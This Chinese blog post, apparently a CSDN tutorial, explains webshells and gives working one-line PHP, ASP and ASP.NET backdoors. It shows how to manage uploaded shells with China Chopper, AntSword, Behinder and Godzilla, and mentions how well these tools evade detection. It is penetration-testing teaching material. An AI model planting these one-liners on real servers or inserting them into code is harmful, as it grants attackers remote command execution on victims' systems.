代码编织梦想

 

WebShell

 

解释

在计算机科学中,Shell 俗称壳(用来区别“核”),是指“为使用者提供操作界面”的软件(命令解释器)。类似于windows 系统给的cmd.exe 或者Linux 下bash/sh 等,虽然这些系统的命令解释器不止一种。

WebShell 是一个网站的后门,也是一个命令解释器,不过是以Web 方式(HTTP 协议)通信(传递命令消息),继承了Web 用户的权限。WebShell 本质上是服务器端可运行的脚本文件,后缀名为.php/.asp/.aspx/.jsp 等,也就是说WebShell 接受来自于Web 用的命令,然后在服务器端执行。

 

分类

大马

WebShell 也可以是大马,也就是网站木马。有一类WebShell 之所以叫大马,是因为与小马(一句话木马)区分开,并且代码量较大,但是功能丰富。同样,大马有很多脚本格式,其功能基本相同。渗透测试的每个团队都有自己的定制木马。

在大马中,我们可以进行文件管理,执行系统命令等,还有一些其他定制功能。

 

小马

小马就是一句话木马,因为其代码量比较小,就是一句简单的代码。以下是各个脚本的一句话

 

#ASP:

<%eval request("cmd")%>

#ASP.NET:

<%@ Page Language="Jscript"%>

<%eval(request.Item["cmd"],"unsafe");%>

#PHP:

<?php @eval($_REQUEST['cmd']);?>

 

JSP 和 jspx 的一句话木马比较复杂一些

一句话木马短小精悍,功能强大,但是需要配合中国菜刀或者中国蚁剑客户端使用,中国菜刀是一句话木马的管理器,也是命令操作接口。中国菜刀在连接一句话木马的时候需要填写密码(实际上就是变量名)。例如,我们上传一个php 的一句话木马,密码就是[cmd]。

 

 

GetShell

GetShell ,顾名思义就是获取web 的过程。当然任意文件上传是GetShell 的主要方式,但并不是唯一途径

借用文件上传在web服务器端上传成功木马,可以使用getshell连接工具连接

 

常用的getshell连接工具

 

中国菜刀

 

github项目地址: https://github.com/raddyfiy/caidao-official-version

 

初始界面

 

在web服务器根目录下创建testshell.php 一句话木马文件

 

连接(空白界面右键添加)

脚本类型可选择: php/asp/aspx

 

连接成功

 

文件管理

在中国菜刀页面继承Web 用户权限可以实现文件管理,包括文件查看、上传、下载、修改、删除甚至运行exe 程序等

 

虚拟终端

在中国菜刀下可以获得cmd 和 bash的命令行接口,可以执行相关命令。

 

数据库管理

我们可以使用中国菜刀进行数据库管理,此时需要知道连接数据库的账密。以MYSQL 为例

<T>MYSQL</T>      //数据库类型

<H>localhost</H>     //数据地址

<U>root</U>     //数据库用户

<P>root</P>    //数据库密码

<L>utf-8</L>     //数据库编码

 

还有一些功能笔者这里就不一一列举了,大家自行挖掘

一款比较老的工具的了,免杀过狗效果一般。

 

中国蚁剑

github项目地址

蚁剑源码: https://github.com/AntSwordProject/antSword

蚁剑加载器: https://github.com/AntSwordProject/AntSword-Loader

蚁剑使用手册: https://doc.u0u.us/zh-hans/getting_started/index.html

 

关于蚁剑的安装过程,可参考: https://blog.csdn.net/qq_36235492/article/details/85713821

初始界面

 

连接(右键添加数据)

 

文件管理

 

更多详细功能可以参考我前面给出的蚁剑使用手册

 

Behinder(冰蝎)

github项目地址: https://github.com/rebeyond/Behinder

软件安装包: https://github.com/rebeyond/Behinder/releases

运行需要java环境(jdk)

 

工具中已经给出了一些小马,直接拿来用即可

 

初始界面

 

连接(右键新增)

 

连接成功

 

 

Godzilla(哥斯拉)

github项目地址: https://github.com/BeichenDream/Godzilla

软件安装包: https://github.com/BeichenDream/Godzilla/releases

运行需要java环境(jdk)

 

初始界面

 

在管理里面可以生成木马,

密码和密钥都需要设定

有效载荷:

JavaDynamicPayload -> jre5及以上

CShapDynamicPayload -> .net2.0及以上

PhpDynamicPayload -> php5.0及以上

payload以及加密器支持

哥斯拉内置了3Payload以及6种加密器,6种支持脚本后缀,20个内置插件

  1. JavaDynamicPayload
    1. JAVA_AES_BASE64
      1. jsp
      2. jspx
    2. JAVA_AES_RAW
      1. jsp
      2. jspx
  2. CShapDynamicPayload
    1. CSHAP_AES_BASE64
      1. aspx
      2. asmx
      3. ashx
    2. JAVA_AES_RAW
      1. aspx
      2. asmx
      3. ashx
  3. PhpDynamicPayload
    1. PHP_XOR_BASE64
      1. php
    2. PHP_XOR_RAW
      1. php

 

来自 <https://github.com/BeichenDream/Godzilla/tree/v1.10-godzilla#payload%E4%BB%A5%E5%8F%8A%E5%8A%A0%E5%AF%86%E5%99%A8%E6%94%AF%E6%8C%81>

 

这里我们做PHP的马,选择以下配置即可

 

值作成功之后将其放置到web服务器下,之后在初始界面选择目标--添加

连接成功

 

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_43252204/article/details/111033698

tryhackme--Kenobi-爱代码爱编程

信息收集,nmap扫描 Samba枚举 利用nmap的脚本 nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target 发现三个分享 进行smb连接 smbclient //<ip>//sharename

php webshell探索-常见小马-爱代码爱编程

webshell 一.何为webshell二.常见小马探索1.直接型2.通过反射类调用3.通过排序函数调用4.通过类的混淆1.类的魔术方法2.类的自定义方法3.通过反射获取类的注释4.反序列化5.通过函数的混淆6.普通的混淆7.其他的隐藏方式1.ob_start2.register_shutdown_function3.回调函数4.数组5.反引号三

get_started_3dsctf_2016 题解-爱代码爱编程

Write Up 知识点关键字样本运行静态分析求解思路本地可以运行,远端不行的解法简单解法 -- 利用后门函数ROP解法 -- 直接获取shell总结 知识点关键字 栈溢出,ROP + shellcode 样本 get_started_3dsctf_2016样本下载 运行 检查文件:   32位小端程序;   开启了NX保护,栈保护未

疫情期间电商行业DDoS攻击增长4倍!看看人家是如何进行DDoS防护-爱代码爱编程

现在,在许多行业领域里DDoS防护的意义已经不言而喻。据悉,近日StormWall专家研究了针对欧洲在线零售业的DDoS攻击。其结果表明:在欧洲的疫情期间,针对电子商务的DDoS攻击数量比去年同期增长了4倍之多。这对该行业的破坏力可想而知。 在电子商务领域,如果网站被攻击变得不可用,将会导致重大的利润损失,服务器瘫痪,卖家可能会因此错过很多订单。而这就引发

简析游戏公司的ddos防护方案,教你做出最合适的选择-爱代码爱编程

相信许多有游戏业务的公司都有一个共同的烦恼,那就是服务器的DDoS防护问题,因为服务器经常会受到一些DDOS攻击。许多游戏公司使用的服务器防不住攻击,十分影响玩家的体验,给公司也带来了巨大的损失。那么如何解决DDoS防护的问题就是迫在眉睫的事情了。 有人的地方就有江湖,互联网上也是如此。网络不断发达的今天,对于企业而言,网络服务器是否安全可能会牵涉到企业存

前端安全(3):跨站请求伪造 CSRF(Cross-site request forgery)-爱代码爱编程

一、什么是CSRF CSRF(Cross-site request forgery)跨站请求伪造:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。 一个典型的CSRF攻击有着如下的流程: 受害者登录a.com,并保留了

从webshell的视角谈攻防对抗-爱代码爱编程

0x0 背景 由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神器”哥斯拉”全部类型的shell均过市面所有静态查杀、流量加密过市面全部流量waf、自带的插件是冰蝎、蚁剑不能比拟的;看名字就很厉害的样子,看描述更是功能强大 不禁内心一阵酸爽。

使用webshell链接kubernetes pods-爱代码爱编程

websocket链接kubernetes pods 前言分析实践注意总结后记 前言 这个周一fetch到一个任务,前端需要使用webshell的方式,链接到正在使用中的kubernetes pods,实现这样的效果 kubectl exec -it podName -c containerName -n namespaceName [ba

webshell入门(二)-爱代码爱编程

webshell绕安全模式执行命令   上一次讲了利用java的runtime.exce()方法执行任意代码,但是必然会受到各种杀毒软件的监控,本次学习一个绕过杀毒软件的webshell   参考网址:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD 在上面网址下